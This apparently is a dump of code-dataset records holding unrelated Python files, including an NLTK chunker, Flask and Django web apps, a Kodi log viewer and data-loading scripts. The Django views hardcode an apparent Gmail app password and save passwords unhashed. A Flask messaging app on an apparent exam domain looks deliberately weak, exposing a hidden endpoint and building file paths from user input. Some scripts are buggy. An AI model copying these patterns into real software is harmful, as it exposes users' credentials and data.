d\n","sub_path":"Projects/json_parsing/json_functions.py","file_name":"json_functions.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"199532600","text":"import nltk\nfrom nltk.corpus import conll2000\nclass UnigramChunker(nltk.ChunkParserI):\n def __init__(self, train_sents):\n train_data = [[(t,c) for w,t,c in nltk.chunk.tree2conlltags(sent)]\n for sent in train_sents]\n self.tagger = 
nltk.UnigramTagger(train_data)\n\n def parse(self, sentence):\n ## get the word's tag\n pos_tags = [pos for (word,pos) in sentence]\n ## tag the chunk\n tagged_pos_tags = self.tagger.tag(pos_tags)\n ## get the chunktagged list\n chunktags = [chunktag for (pos, chunktag) in tagged_pos_tags]\n ## get the list\n conlltags = [(word, pos, chunktag) for ((word,pos),chunktag)\n in zip(sentence, chunktags)]\n ## return the chunktagged data use conlltagstree struction\n return nltk.chunk.conlltags2tree(conlltags)\n\ntest_sents = conll2000.chunked_sents('test.txt', chunk_types=['NP'])\ntrain_sents = conll2000.chunked_sents('train.txt', chunk_types=['NP'])\nunigram_chunker = UnigramChunker(train_sents)\nprint(unigram_chunker.evaluate(test_sents))\n\n\n","sub_path":"Chapter7/completeChunking.py","file_name":"completeChunking.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"123244734","text":"from flask import Flask, render_template, flash, redirect, url_for, request, send_file, make_response\nfrom app import app\nfrom modules.__init__ import db, login_manager\nfrom modules.models.forms import LoginForm, RegisterForm\nfrom modules.models.tables import User, CallLogs\nfrom flask_login import login_user, logout_user, current_user\nfrom werkzeug.security import generate_password_hash, check_password_hash\nimport predict\nimport os\nfrom werkzeug.exceptions import BadRequest\nfrom werkzeug.utils import secure_filename\n\nALLOWED_EXTENSIONS = set(['jpg', 'jpeg'])\n\n@app.route('/', methods=['GET'])\ndef index():\n\treturn render_template('serving_template.html')\n@app.route('/image', methods=[\"POST\"])\ndef predict_plants_web():\n\t\"\"\"\n\tTake the input image and style transfer it\n\t\"\"\"\n\t# check if the post request has the file part\n\tinput_file = request.files.get('file')\n\tif not input_file:\n\t\tprint(\"File not present\")\n\t\treturn BadRequest(\"File not present in 
request\")\n\n\tfilename = secure_filename(input_file.filename)\n\tif filename == '':\n\t\tprint(\"File name is not present\")\n\t\treturn BadRequest(\"File name is not present in request\")\n\tif not allowed_file(filename):\n\t\tprint(\"Invalid type\")\n\t\treturn BadRequest(\"Invalid file type\")\n\n\tif not os.path.exists(\"inputs/\"):\n\t\tprint(\"os.mkdir('inputs/')\")\n\t\tos.mkdir(\"inputs/\")\n\n\tinput_filepath = os.path.join(\"inputs/\", filename)\n\tprint(input_filepath)\n\tinput_file.save(input_filepath)\n\n\tif not os.path.exists(\"outputs/\"):\n\t\tos.mkdir(\"outputs/\")\n\toutput_filepath = os.path.join(\"outputs/\", 'msk_' + filename)\n\timg_str = predict.get_plants(input_filepath, output_filepath)\n\n\tresponse = make_response(img_str)\n\tresponse.headers.set('Content-Type', 'image/jpeg')\n\tnew_log = CallLogs(input_filepath, output_filepath, current_user.get_id())\n\tdb.session.add(new_log)\n\tdb.session.commit()\n\treturn response\n\ndef allowed_file(filename):\n\treturn '.' 
in filename and \\\n\t\tfilename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n@login_manager.user_loader\ndef load_user(id):\n\treturn User.query.filter_by(id=id).first()\n\t#return User.get_id(User.query.filter_by(id=id).first())\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user and check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember_me.data)\n flash(\"Logado com sucesso!\")\n if user.username == 'adm':\n return redirect(url_for(\"cadastro\"))\n else:\n return redirect(url_for(\"index\"))\n else:\n flash(\"Login inválido!\")\n return render_template('login.html', form=form)\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n flash(\"Até mais!\")\n return redirect(url_for(\"index\"))\n\n@app.route(\"/cadastro\", methods=[\"GET\", \"POST\"])\ndef cadastro():\n form = RegisterForm()\n if form.validate_on_submit():\n username = form.username.data\n password = generate_password_hash(form.password.data)\n name = form.name.data\n email = form.email.data\n try:\n new_user = User(username, password, name, email)\n db.session.add(new_user)\n db.session.commit()\n return redirect(url_for('login'))\n except:\n flash('Ocorreu um erro, verifique os dados e tente novamente.')\n return render_template('cadastro.html', form=form)\n\n@app.route(\"/home\")\ndef home():\n\treturn render_template(\"index.html\")\n\n@app.route(\"/log\")\ndef log():\n\treturn render_template(\"log.html\")","sub_path":"modules/controllers/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"547998359","text":"\n# # *运算符 打印三角形\n# for i in range(1, 6):\n# print(\"*\"*i)\n\n# print(max([1, 3, 4, 6, 5]))\n# print(max(\"abcdef\"))\n\n\n# del\n# 列表: del 列表名[下标索引]\n# 字典: del 
字典名[key]\n\n# 删除变量 了解(后期讲解)\n\n# 多维列表/元祖访问的示例\n\nmy_list = [1, 3, 5, (2, 3, 5, {\"name\": \"小明\", \"test\": [\"你好\", \"终于等到你\"]}, 2)]\n\n# 终于等到你\nret1 = my_list[3]\n# (2, 3, 5, {'name': '小明', 'test': ['你好', '终于等到你']}, 2)\n# print(ret1)\nret2 = ret1[3]\n# {'name': '小明', 'test': ['你好', '终于等到你']}\n# print(ret2)\nret3 = ret2[\"test\"]\n# ['你好', '终于等到你']\n# print(ret3)\nret4 = ret3[1]\nprint(ret4)\n\n#\nret = my_list[3][3][\"test\"][1]\nprint(ret)\n","sub_path":"pythonstage1/day06/04-公共方法.py","file_name":"04-公共方法.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225066375","text":"#!/usr/bin/env python3\n\n# EPITECH PROJECT, 2017\n# 104intersection.py\n# File description:\n# main file for 104intersection\n\nimport sys\nimport math\nfrom calculate_delta import *\n\ndef verify_errors(argv):\n\tif len(argv) != 9:\n\t\texit(84)\n\tif int(argv[1]) < 1 or 3 < int(argv[1]):\n\t\texit(84)\n\tif int(argv[8]) % 90 == 0 and int(argv[1]) == 3:\n\t\texit(84)\n\tif int(argv[8]) == 0 and (int(argv[1]) == 1 or int(argv[1] == 2)):\n\t\texit(84)\n\ndef print_line(argv):\n\tprint(\"straight line going through the (\", argv[2], \",\", argv[3], \",\",\n\targv[4], \") point and of direction vector (\", argv[5], \",\", argv[6], \",\",\n\targv[7], \")\", sep='')\n\ndef main_insertion(argv):\n\tif int(argv[1]) == 1:\n\t\tprint(\"sphere of radius\", argv[8])\n\t\tprint_line(argv)\n\t\tcalculate_delta_sphere(argv)\n\telif int(argv[1]) == 2:\n\t\tprint(\"cylinder of radius\", argv[8])\n\t\tprint_line(argv)\n\t\tcalculate_delta_cylinder(argv)\n\telif int(argv[1]) == 3:\n\t\tprint(\"cone of\", argv[8], \"degree angle\")\n\t\tprint_line(argv)\n\t\tcalculate_delta_cone(argv)\n\ndef main(argv):\n\tverify_errors(argv)\n\tmain_insertion(argv)\n\n\nif __name__ == '__main__':\n 
main(sys.argv)\n","sub_path":"104intersection_2017/104intersection.py","file_name":"104intersection.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"383290745","text":"import difflib\ndef my_sol_check(exo, exp):\n with open(exo, 'r') as the_in:\n with open(exp, \"r\") as the_out:\n \tl = the_in.readline().splitlines()\n \tr = the_out.readline().splitlines()\n \tdiff = difflib.Differ().compare(r,l)\n \tprint(' '.join(diff))\n\n\n \t\t\nmy_sol_check(\"test\", \"tested\")\n","sub_path":"challenges/compare_the_triplets/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"632573183","text":"import django\nimport sys\nimport os\nimport json\nfrom datetime import datetime\n\nfrom pandas.io.json import json_normalize\nproj_dir = os.environ[\"PROJDIR\"]\nsys.path.append(os.path.join(proj_dir, \"src\", \"dj\"))\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = \"proj.settings\"\ndjango.setup()\ndef flatten_json(y):\n out = {}\n\n def flatten(x, name=''):\n if type(x) is dict:\n for a in x:\n flatten(x[a], name + a + '_')\n elif type(x) is list:\n i = 0\n for a in x:\n flatten(a, name + str(i) + '_')\n i += 1\n else:\n out[name[:-1]] = x\n\n flatten(y)\n return out\n\ndef fetch_and_flatten():\n index_keys = set()\n data_file_name = 'rapido_dataset.json'\n index_name = 'rapido_index.json'\n data_source = 'rapido'\n result_file = open(f\"{proj_dir}/{data_file_name}\", \"w\")\n from ackore.models import Policy\n events = Policy.objects.filter(plan_id='rapido_trip')\n for obj in events:\n in_json = {\n \"id\": obj.data.get('id'),\n \"user_id\": obj.data.get('user_id'),\n \"name\" : obj.data.get('name'),\n \"phone\" : obj.data.get('phone'),\n \"city\" : obj.data.get('city'),\n \"email\" : obj.data.get('email'),\n \"driver_id\" : obj.data.get('driver_id'),\n 
\"dl_number\" : obj.data.get('dl_number'),\n \"vehicle_number\" : obj.data.get('vehicle_number'),\n \"extra\" : obj.data.get('extra'),\n \"cancelled\" : obj.data.get('cancelled'),\n \"timestamp\": str(obj.created_on)[:10]+'T'+str(obj.created_on)[11:19]+'.000Z',\n }\n flat_json = flatten_json(in_json)\n out_json = {}\n for key, value in flat_json.items():\n if value != \"\":\n value = f\"{value}\"\n flat_json[key] = value\n out_json[key] = value\n index_keys.add(key)\n out_json = json.dumps(out_json)\n result_file.write(f\"{out_json}\\n\")\n print(out_json)\n keys = list(keys)\n create_index(keys, data_source, index_name, data_file_name)\n\ndef create_index(keys, data_source, index_name, data_file_name):\n index = {\n \"type\": \"index\",\n \"spec\": {\n \"dataSchema\": {\n \"dataSource\": data_source,\n \"parser\": {\n \"type\": \"string\",\n \"parseSpec\": {\n \"format\": \"json\",\n \"dimensionsSpec\": {\n \"dimensions\": keys\n },\n \"timestampSpec\": {\n \"column\": \"timestamp\",\n \"format\": \"iso\"\n }\n }\n },\n \"metricsSpec\": [],\n \"granularitySpec\": {\n \"type\": \"uniform\",\n \"segmentGranularity\": \"day\",\n \"queryGranularity\": \"none\",\n \"intervals\": [\"2015-01-01/2020-12-30\"],\n \"rollup\": False\n }\n },\n \"ioConfig\": {\n \"type\": \"index\",\n \"firehose\": {\n \"type\": \"local\",\n \"baseDir\": \"quickstart/\",\n \"filter\": data_file_name\n },\n \"appendToExisting\": False\n },\n \"tuningConfig\": {\n \"type\": \"index\",\n \"targetPartitionSize\": 5000000,\n \"maxRowsInMemory\": 25000,\n \"forceExtendableShardSpecs\": True\n }\n }\n }\n json.dump(index, open(index_name, 'w'), indent=4)\n\n\n","sub_path":"load_data/rapido.py","file_name":"rapido.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"347796899","text":"# -*- coding: UTF-8 -*-\n\nimport string,xbmcgui\nfrom resources.lib.modules import control\n\n\nAddon = 
control.Addon\naddon = control.AddonID\naddonName = control.AddonTitle\nmoduleName = 'Log Viewer'\ncontents = ''\npath = ''\n\n\n# get actioncodes from keymap.xml\nACTION_MOVE_LEFT = 1\nACTION_MOVE_RIGHT = 2\nACTION_MOVE_UP = 3\nACTION_MOVE_DOWN = 4\nACTION_PAGE_UP = 5\nACTION_PAGE_DOWN = 6\nACTION_SELECT_ITEM = 7\n\n\nclass Viewer(xbmcgui.WindowXML):\n def __init__(self, strXMLname, strFallbackPath):\n self.previous_menu = 10\n self.back = 92\n self.page_up = 5\n self.page_down = 6\n # XML id's\n self.main_window = 1100\n self.title_box_control = 20301\n self.content_box_control = 20302\n self.list_box_control = 20303\n self.line_number_box_control = 20201\n self.scroll_bar = 20212\n\n\n def onInit(self):\n # title box\n title_box = self.getControl(self.title_box_control)\n title_box.setText(str.format('%s %s') % (addonName, moduleName))\n # content box\n content_box = self.getControl(self.content_box_control)\n content_box.setText(contents)\n # Set initial focus\n self.setFocusId(self.scroll_bar)\n\n\n def onAction(self, action):\n # non Display Button control\n if action == self.previous_menu:\n self.close()\n elif action == self.back:\n self.close()\n\n\n def onClick(self, control_id):\n if control_id == 20293:\n self.close()\n text_view(path)\n\n\n def onFocus(self, control_id):\n pass\n\n\ndef text_view(loc='', data=''):\n global contents\n global path\n contents = ''\n path = loc\n # todo, path can be a url to an internet file\n if not path and not data: return\n if path and not data:\n if 'http' in string.lower(path):\n # todo, open internet files from a url path\n control.OkDialog('Notice', 'This feature is not yet available')\n return\n # Open and read the file from path location\n temp_file = open(path, 'rb')\n contents = temp_file.read()\n temp_file.close()\n # Send contents to text display function\n elif data:\n contents = data\n if not contents:\n control.OkDialog('Notice', 'The file was empty')\n return\n contents = contents.replace(' ERROR: ', ' 
[COLOR red]ERROR[/COLOR]: ') \\\n .replace(' WARNING: ', ' [COLOR gold]WARNING[/COLOR]: ')\n win = Viewer('textview-skin.xml', control.addonInfo('path'))\n win.doModal()\n del win\n\n\n# To call module put the following in the addon list or context menu\n# import TextViewer\n# TextViewer.text_view('log')\n\n\n","sub_path":"script.ezclean/resources/lib/api/TextViewer.py","file_name":"TextViewer.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599482639","text":"\"\"\"\nFile for downloading the OpenML datasets\n\"\"\"\n\nimport sys\nimport os\n# must be run from the project root so the data package\n# will be added to the path\nsys.path.append(os.path.abspath('.'))\n\nfrom data.config import CONFIG\nfrom data.io import write_dataset\n\n\nimport pickle\nimport pandas as pd\n\nimport openml\nfrom openml.exceptions import OpenMLServerError, PyOpenMLError\nfrom requests.exceptions import ChunkedEncodingError\nfrom arff import BadNominalValue\n\nCHECKPOINT_ITERS = 25\n\n\ndef get_dataset_ids():\n \"\"\"Get the ids of the dotasets to download\"\"\"\n dataset_metadata = openml.datasets.list_datasets()\n metadata_df = pd.DataFrame.from_dict(dataset_metadata, orient='index')\n filtered_df = metadata_df[metadata_df.NumberOfInstancesWithMissingValues == 0]\n return filtered_df.did.values\n \n \ndef download_datasets(dataset_ids, start_iteration=0, verbose=False):\n \"\"\"Download the datasets that correspond to all of the give IDs\"\"\"\n num_datasets = len(dataset_ids)\n good_dataset_ids = []\n bad_dataset_ids = []\n exceptions = []\n \n # load previous saved values of above variables\n info_filename = get_info_filename()\n if os.path.isfile(info_filename):\n if verbose: print('Loading download info from file')\n with open(info_filename, 'rb') as f:\n info = pickle.load(f)\n start_iteration = info['iteration']\n good_dataset_ids = info['good_dataset_ids']\n bad_dataset_ids = 
info['bad_dataset_ids']\n exceptions = info['exceptions']\n\n # loop through dataset_ids and download corresponding datasets\n for i in range(start_iteration, num_datasets):\n dataset_id = dataset_ids[i]\n if verbose:\n print('{} of {}\\tdataset ID: {} ...' \\\n .format(i + 1, num_datasets, dataset_id), end=' ')\n # OpenML likes to throw all kinds of errors when getting datasets\n try:\n dataset_id = int(dataset_id)\n dataset = openml.datasets.get_dataset(dataset_id)\n good_dataset_ids.append(dataset_id)\n write_dataset(dataset_id, dataset)\n if verbose: print('Success')\n # except (OpenMLServerError, PyOpenMLError, ChunkedEncodingError,\n # BadNominalValue, EOFError) as e:\n except Exception as e:\n bad_dataset_ids.append(dataset_id)\n exceptions.append(e)\n if verbose: print('Failure', repr(e))\n # checkpoint info\n if (i + 1) % CHECKPOINT_ITERS == 0:\n if verbose:\n print('Reached iteration {}. Writing download info' \\\n .format(i + 1))\n write_download_info({\n 'iteration': i + 1,\n 'num_datasets': num_datasets,\n 'good_dataset_ids': good_dataset_ids,\n 'bad_dataset_ids': bad_dataset_ids,\n 'exceptions': exceptions\n })\n\n \ndef write_download_info(info):\n \"\"\"Write the information about the success/failure of downloading datasets\"\"\"\n filename = get_info_filename()\n with open(filename, 'wb') as f:\n pickle.dump(info, f) \n\n\ndef get_info_filename():\n \"\"\"Get location of where to write the download information\"\"\"\n return CONFIG['datasets_info']\n\n\nif __name__ == '__main__':\n download_datasets(get_dataset_ids(), verbose=True)\n","sub_path":"phases01_data_and_posteriors/data_scripts/download_datasets.py","file_name":"download_datasets.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"188482856","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\nfrom django.http import JsonResponse # JSON 응답\nfrom map.models 
import Point\nfrom django.forms.models import model_to_dict\n\ndef contact(request):\n if request.method == 'POST':\n email = request.POST.get('email')\n comment = request.POST.get('comment')\n # 발신자주소, 수신자주소, 메시지\n send_mail('010wodnjs@gamil.com', email, comment)\n return render(request, 'contact_success.html')\n return render(request, 'contact.html')\nimport smtplib\nfrom email.mime.text import MIMEText\ndef send_mail(from_email, to_email, msg):\n smtp = smtplib.SMTP_SSL('smtp.gmail.com', 465) # SMTP 설정\n smtp.login(from_email, 'xynzxitkbwfjngpj') # 인증정보 설정\n msg = MIMEText(msg)\n msg['Subject'] = '[문의사항]' + to_email # 제목\n msg['To'] = from_email # 수신 이메일\n smtp.sendmail(from_email, from_email, msg.as_string())\n smtp.quit()\n\ndef map_data(request):\n data = Point.objects.all()\n map_list = []\n for d in data:\n d = model_to_dict(d) # QuerySet -> Dict\n map_list.append(d)\n# dict가 아닌 자료는 항상 safe=False 옵션 사용\n return JsonResponse(map_list, safe=False)\n\ndef map(request):\n return render(request, 'map.html')\n\ndef index(request):\n return render(request, 'index.html')\n\nfrom django.http import HttpResponseRedirect\nfrom article.models import User, Article\nimport hashlib\n\ndef signup(request):\n if request.method == 'POST':\n # 회원정보 저장\n email = request.POST.get('email')\n name = request.POST.get('name')\n\n pwd = request.POST.get('pwd')\n # m = hashlib.sha256()\n # m.update( bytes(pwd, encoding = \"utf-8\") )\n # pwd = m.hexdigest()\n\n user = User(email=email, name=name, pwd=pwd)\n user.save()\n return HttpResponseRedirect('/index/')\n return render(request, 'signup.html')\n\ndef signin(request):\n if request.method == 'POST':\n # 회원정보 조회\n email = request.POST.get('email')\n pwd = request.POST.get('pwd')\n try:\n # select * from user where email=? 
and pwd=?\n user = User.objects.get(email=email, pwd=pwd)\n request.session['email'] = email\n return render(request, 'signin_success.html')\n except:\n return render(request, 'signin_fail.html')\n return render(request, 'signin.html')\n\ndef signout(request):\n del request.session['email'] # 개별 삭제\n request.session.flush() # 전체 삭제\n return HttpResponseRedirect('/index/')\n\ndef write(request):\n if request.method == 'POST':\n title = request.POST.get('title')\n content = request.POST.get('content')\n try:\n email = request.session['email']\n # select * from user where email = ?\n user = User.objects.get(email=email)\n # insert into article (title, content, user_id) values (?, ?, ?)\n article = Article(title=title, content=content, user=user)\n article.save()\n return render(request, 'write_success.html')\n except:\n return render(request, 'write_fail.html')\n return render(request, 'write.html')\n\ndef list(request):\n # select * from article order by id desc\n article_list = Article.objects.order_by('-id')\n context = {\n 'article_list' : article_list\n }\n return render(request, 'list.html', context)\n\ndef detail(request, id):\n # select * from article where id = ?\n article = Article.objects.get(id=id)\n context = {\n 'article' : article\n }\n return render(request, 'detail.html', context)\n\ndef update(request, id):\n # select * from article where id = ?\n article = Article.objects.get(id=id)\n if request.method == 'POST':\n title = request.POST.get('title')\n content = request.POST.get('content')\n try:\n # update article set title = ?, content = ? 
where id = ?\n article.title = title\n article.content = content\n article.save()\n return render(request, 'update_success.html')\n except:\n return render(request, 'update_fail.html')\n context = {\n 'article' : article\n }\n return render(request, 'update.html', context) \n\ndef delete(request, id):\n try:\n # select * from article where id = ?\n article = Article.objects.get(id=id)\n article.delete()\n return render(request, 'delete_success.html')\n except:\n return render(request, 'delete_fail.html')\n ","sub_path":"board/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"78308177","text":"from flask import Blueprint, render_template, request, render_template_string, current_app, flash, redirect, url_for, session\nfrom flask_login import current_user, login_user, logout_user, login_required\nfrom werkzeug.urls import url_parse\nimport re\nimport json\nimport os\nfrom datetime import datetime\nfrom uuid import uuid4\nfrom base64 import b64encode, b64decode\n\nfrom flaskr.app import db\nfrom flaskr.forms import LoginForm, RegisterForm, ModifyForm, SendMsgForm\nfrom flaskr.models import User, Message\n\nmain = Blueprint('main', __name__)\n\n@main.errorhandler(404)\ndef page_not_found(error):\n return '404 page not found', 404\n\n\n@main.route('/')\ndef home():\n return render_template('pages/index.html')\n\n# Terms and Conditions\n@main.route('/terms', methods=[\"GET\"])\ndef terms():\n return render_template('pages/terms.html')\n\n@main.route('/robots.txt')\ndef robots():\n resp = make_response('''\nUser-agent: *\nDisallow: /whois\n''')\n resp.mimetype = \"text/plain\"\n return resp\n\n@main.route('/whois', methods=[\"GET\"])\ndef who_is():\n target = None\n if 'id' in request.args:\n try:\n target = int(request.args['id'])\n except:\n return \"400 Bad Request (id could not be cast)\"\n else:\n return \"400 Bad Request (id empty)\"\n\n 
if target is not None:\n User.query.all()\n user = User.query.filter_by(id=target).first()\n if user is None:\n return '404 Not Found', 404\n else:\n return user.user_name, 200\n\n# User Login\n@main.route('/login', methods=[\"POST\",\"GET\"])\ndef login():\n # Redirect Logged In Users\n if session.get('logged_in'):\n return redirect('/user')\n\n error = None\n if request.method == 'GET':\n form = LoginForm(request.form)\n return render_template('forms/login.html', form=form)\n else:\n if 'name' in request.form and 'password' in request.form:\n User.query.all()\n user = User.query.filter_by(user_name=request.form['name']).first()\n\n if user is not None:\n if user.check_password(request.form['password']):\n error = 'Password Matched'\n login_user(user)\n session['logged_in'] = True\n session['user_name'] = user.user_name\n session['user_id'] = user.id\n\n flash('Login Successful')\n return redirect('/user')\n else:\n error = 'Login Failed'\n else:\n error = 'Login Failed'\n\n form = LoginForm(request.form)\n return render_template('forms/login.html', form=form, err=error)\n else:\n form = LoginForm(request.form)\n return render_template('forms/login.html', form=form, err=True)\n\n@main.route('/logout')\ndef logout():\n logout_user()\n session['logged_in'] = False\n flash('Logout Successful')\n return redirect('/login')\n\n# User Information Functionality.\n@main.route('/user', methods=[\"GET\"])\ndef users():\n\n if not session.get('logged_in'):\n return redirect('/')\n\n form = ModifyForm()\n User.query.all()\n user = User.query.filter_by(user_name=session['user_name']).first()\n if user is not None:\n form.firstname.data = user.user_firstname\n form.lastname.data = user.user_lastname\n form.signature.data = user.user_signature\n return render_template('pages/users.html', form=form)\n\n@main.route('/user/', methods=[\"GET\", \"POST\"])\ndef users_data(userid):\n if not session.get('logged_in'):\n return redirect('/')\n\n\n name = session['user_name']\n form = 
ModifyForm(request.form)\n\n firstname = None\n lastname = None\n signature = None\n\n creds = {}\n if request.method == \"GET\":\n User.query.all()\n user = User.query.filter_by(id=userid).first()\n if user is not None:\n\n if user.user_name == name:\n username = user.user_name\n mailbox = user.user_mailbox\n signature = user.user_signature\n firstname = user.user_firstname\n lastname = user.user_lastname\n\n creds.update({'User Name':username})\n creds.update({'Mailbox':mailbox})\n creds.update({'First Name':firstname})\n creds.update({'Last Name':lastname})\n creds.update({'Signature':signature})\n\n form.firstname.data = firstname\n form.lastname.data = lastname\n\n return render_template('lists/view.html', list=creds)\n\n@main.route('/modify/', methods=[\"GET\",\"POST\"])\ndef user_modify(userid):\n if not session.get('logged_in'):\n return redirect('/')\n\n User.query.all()\n user = User.query.filter_by(id=userid).first()\n if user is not None:\n if request.method == \"GET\":\n form = ModifyForm()\n form.firstname.data = user.user_firstname\n form.lastname.data = user.user_lastname\n form.signature.data = user.user_signature\n return render_template('forms/modify.html', form=form)\n\n elif request.method == \"POST\":\n User.query.all()\n user = User.query.filter_by(id=userid).first()\n\n # Only update if we are the account owner\n if session['user_name'] == user.user_name:\n req_data = request.form['firstname']\n firstname = request.form['firstname']\n lastname = request.form['lastname']\n signature = request.form['signature']\n\n # Update the User\n user.update_user(firstname, lastname, signature)\n flash('You successfully updated your information!')\n return redirect('/user')\n else:\n return redirect('/')\n\n## Messaging Routes\n@main.route('/message/view', methods=[\"GET\"])\ndef view_messages():\n if not session.get('logged_in'):\n return redirect('/')\n\n User.query.all()\n user = User.query.filter_by(user_name=session['user_name']).first()\n mailkey = 
None\n if user is not None:\n mailkey = b64encode(bytes(user.user_mailbox, 'utf-8')).decode('utf-8')\n return render_template('pages/message.html', mailkey=mailkey)\n\n@main.route('/message/history', methods=[\"GET\"])\ndef show_messages():\n # Kickout Scrubs\n if not session.get('logged_in'):\n return redirect('/')\n\n\n mailbox = None\n error = None\n User.query.all()\n name = session['user_name']\n sess_user = User.query.filter_by(user_name=name).first()\n if sess_user is None:\n return '403 Permission Denied', 403\n\n\n # Bail out on non standard requests.\n if 'v' in request.args:\n try:\n mailbox = request.args['v']\n mailbox_dec = b64decode(mailbox).decode('utf-8')\n print(\"Mailbox Decoded: {}\".format(mailbox_dec))\n mailbox_owner = User.query.filter_by(user_mailbox=mailbox_dec).first()\n if mailbox_owner is None:\n return '400 Bad Request', 400\n\n if mailbox_owner.user_name != sess_user.user_name:\n return '403 Permission Denied', 403\n\n\n except:\n error = \"Cannot base64 decrypt value.\"\n return render_template('lists/history.html', err=error)\n else:\n error = \"No mailkey provided.\"\n return render_template('lists/history.html', err=error)\n\n filepath = os.path.join(current_app.config.get(\"APP_BASE_DIR\"), mailbox + \".txt\")\n fp = open(filepath, \"r\")\n\n MSG_REC_SIZE = current_app.config.get(\"MSG_REC_SIZE\")\n msg_block = fp.read(MSG_REC_SIZE)\n msg_obj = Message()\n msgs = []\n\n while len(msg_block) == MSG_REC_SIZE:\n msg_obj.reload(msg_block)\n msg_str = msg_obj.as_padded_string()\n src = msg_str[0:36]\n dst = msg_str[36:72]\n msg = msg_str[72:MSG_REC_SIZE]\n\n\n src_user = User.query.filter_by(user_mailbox=src).first()\n dst_user = User.query.filter_by(user_mailbox=dst).first()\n tmp = {}\n if src_user is not None:\n tmp.update({'src':src_user.user_name})\n tmp.update({'srcbox':src})\n else:\n tmp.update({'src':src})\n\n if dst_user is not None:\n tmp.update({'dst':dst_user.user_name})\n tmp.update({'dstbox':dst})\n else:\n 
tmp.update({'dst':dst})\n\n tmp.update({'msg':msg.rstrip(' ')})\n msgs.append(tmp)\n\n msg_block = fp.read(MSG_REC_SIZE)\n\n fp.close()\n\n # Generate Message Form\n form = SendMsgForm(request.form)\n return render_template('lists/history.html', msgs=msgs[::-1], form=form)\n\n@main.route('/message/send', methods=[\"POST\"])\ndef send_message():\n # Kickout Scrubs\n if not session.get('logged_in'):\n return redirect('/')\n\n name = session['user_name']\n User.query.all()\n\n src_user = User.query.filter_by(user_name=name).first()\n\n if src_user is None:\n flash(\"User mailbox not found\")\n return redirect('/')\n src_mailbox = src_user.user_mailbox\n mailkey = b64encode(bytes(str(src_mailbox), 'utf-8')).decode('utf-8')\n\n # Check target is valid\n target = request.form['mailbox']\n dst_user = User.query.filter_by(user_mailbox=target).first()\n if dst_user is None:\n flash(\"User mailbox not found\")\n return redirect('/message/history?v=' + mailkey)\n dst_mailbox = dst_user.user_mailbox\n\n message = request.form.get(\"message\", '')\n message = request.form['message']\n\n\n # Craft the message and send it.\n new_msg = Message(src_mailbox, dst_mailbox, message)\n success = new_msg.send_msg()\n if not success:\n flash(\"Message failed to send\")\n return redirect('/message/history?v=' + mailkey)\n else:\n # Success\n return redirect('/message/history?v=' + mailkey)\n\n# User Registration\n@main.route('/register', methods=[\"POST\",\"GET\"])\ndef register():\n form = RegisterForm(request.form)\n error = None\n if request.method == \"POST\":\n if 'name' in request.form and 'password' in request.form:\n User.query.all()\n user = User.query.filter_by(user_name=request.form['name']).first()\n if user is None:\n uid = uuid4()\n # Create User\n new_user = User(request.form['name'], request.form['password'], 'Alice', 'Anonymous', 'iDont Facegood, literally iDont Even. lol! 
#6443_EXAM_MEME', str(uid) )\n User.register_user(new_user)\n\n # Create User Mailbox\n mailbox_name = b64encode(bytes(str(uid), 'utf-8')).decode('utf-8')\n filepath = os.path.join(current_app.config.get(\"APP_BASE_DIR\"), mailbox_name + \".txt\")\n fp = open(filepath, \"wb\")\n fp.close()\n\n greeting = \"Welcome to Facegood, {}. I am Noone.\".format(new_user.user_name)\n greet_msg = Message(current_app.config.get(\"GREETER\"), str(uid), greeting)\n greet_msg.send_msg()\n\n flash('Registration Successful')\n return redirect('/login')\n # Create Pubkey File Name\n # Create Privkey File Name\n # Generate Keypair\n else:\n error = \"User already exists.\"\n\n return render_template('forms/register.html', form=form, err=error)\n\n\n","sub_path":"WYrE8ZXVWRwvAKw1dhoHew.exam.ns.agency/vpn-static/flaskr/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"552097443","text":"#!/usr/bin/env python\n#coding: utf-8\n\n################################################################################################\n## this node contains transformation algorithmes allowing interpretation of behaviors given by \n## b_s_i node and will select and modify animation given from the pose repertory in order\n## to reflect in the robot the behavior given from b_s_i node \n################################################################################################\n\nimport rospy\nfrom std_msgs.msg import String, UInt8\nimport threading\nfrom NaoMotion import *\nfrom BSI import *\n\n\n# global variable telling if the robot is busy or not\nrobotBusy = True\n\n\ndef callback_activityRobot(data):\n global robotBusy\n if str(data.data) == \"WAITING_FOR_FEEDBACK\":\n if cNaoMotion.get_posture() == \"Crouch\":\n # the robot needs to stand up in order to launch animations\n cNaoMotion.stand_init()\n 